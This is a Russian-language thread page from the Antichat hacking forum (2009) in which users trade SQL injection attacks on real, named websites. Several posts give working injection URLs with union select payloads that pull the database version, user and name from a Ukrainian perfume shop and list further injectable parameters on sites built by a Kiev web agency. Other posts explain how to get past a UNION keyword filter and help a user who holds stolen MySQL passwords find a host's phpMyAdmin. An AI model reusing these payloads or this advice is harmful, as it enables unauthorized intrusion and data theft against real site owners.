ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #6101  
Старый 21.03.2009, 01:30
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
mysql
MySQL Support enabled
Active Persistent Links 0
Active Links 0
Client API version 5.0.67
MYSQL_MODULE_TYPE external
MYSQL_SOCKET /tmp/mysql.sock
MYSQL_INCLUDE -I/usr/local/include/mysql
MYSQL_LIBS -L/usr/local/lib/mysql -lmysqlclient
С этого ничего. Что за инфо.пхп?
 
Ответить с цитированием

  #6102  
Старый 21.03.2009, 01:42
Radiator
Участник форума
Регистрация: 17.03.2009
Сообщений: 234
Провел на форуме:
1031617

Репутация: 128
По умолчанию

Цитата:
Сообщение от mailbrush  
С этого ничего. Что за инфо.пхп?
http://gcmpp.ru/info.php
 
Ответить с цитированием

  #6103  
Старый 21.03.2009, 05:02
TELO
Познающий
Регистрация: 21.01.2009
Сообщений: 98
Провел на форуме:
227123

Репутация: 122
Отправить сообщение для TELO с помощью ICQ
По умолчанию

а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5
 
Ответить с цитированием

  #6104  
Старый 21.03.2009, 05:55
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию

Цитата:
Сообщение от TELO  
а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5
Дальше только перебор ибо 4 ветка без доступа к mysql и как правило file_priv в N:
http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(concat_ws(0x3A,u ser(),@@version,database())))
 
Ответить с цитированием

  #6105  
Старый 21.03.2009, 06:19
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от TELO  
а как дальше?
http://all-perfumes.com.ua/index.php?act=publ&id=-39%20union%20select%201,2,3,4,5

http://all-perfumes.com.ua/index.php?act=publ&id=-39+union+select+1,2,3,4,unhex(hex(version()))-- почему в unhex(hex(version()))? Потому что, когда мы ставим просто version() вылетает ошибка. Будем кодировать) Версия 4, т.е. таблицы через information_schema найти не получится =( Проверим file_priv, стандартные таблицы... Ничего не нашел =( Даже побрутил и ничего не вышло( Но зато это агенство всем наклепало свои уязвимые движки =) Смотрит сайты тут: http://www.web-sites.kiev.ua/portfolio.php Ошибки тут: index.php?act=goods&id=7'&gid=11
index.php?act=page&p=2'

Если найти таблицы, то можно писать сплоит)



P.S: А я вот решил глянуть мой именно домен) http://tigger.com/inspirations/install.php?error=true - вот итог =) Хм... Я так понимаю, что это /install/ но почему-то дальше не хочет =( может есть вариант какой-нибудь)?

Последний раз редактировалось Tigger; 21.03.2009 в 07:19..
 
Ответить с цитированием

  #6106  
Старый 21.03.2009, 09:59
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Radiator, сплоит ищи под ядро.
 
Ответить с цитированием

  #6107  
Старый 21.03.2009, 12:08
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

сегодня столкнулся с такой проблемой:

через group by определил кол колонок...

а когда уже пишут +union+select.....
слово union заменяется на "тра та та"
как эту хрень обойти?
 
Ответить с цитированием

  #6108  
Старый 21.03.2009, 12:14
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

попробуй регистр букв менять, например UniOn UNiON, а если там нормальная фильтрация, то болт и тебе придётся использовать блайнд-скул.
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием

  #6109  
Старый 21.03.2009, 13:10
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766

Репутация: 61
По умолчанию

Вопрос не по уязмимость но задам сюда:
Где находится PhpMyAdmin у хостинга www.infobox.ru
Просто есть сайт у которого знаю пассы от MySQL а зайти туда только с локала похоже можно (в файле конфига у сайта хост прописан: "mysqlserver")
Кто пользуется этим хостингом или просто знает где у них можно зайти, напишите плиз.
 
Ответить с цитированием

  #6110  
Старый 21.03.2009, 13:15
[NiGHT]DarkAngel
Участник форума
Регистрация: 29.03.2005
Сообщений: 138
Провел на форуме:
812087

Репутация: 129
По умолчанию

Цитата:
Сообщение от Byrger  
Вопрос не по уязмимость но задам сюда:
Где находится PhpMyAdmin у хостинга www.infobox.ru
Просто есть сайт у которого знаю пассы от MySQL а зайти туда только с локала похоже можно (в файле конфига у сайта хост прописан: "mysqlserver")
Кто пользуется этим хостингом или просто знает где у них можно зайти, напишите плиз.
http://mysql.infobox.ru/ - вот лови адрес
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ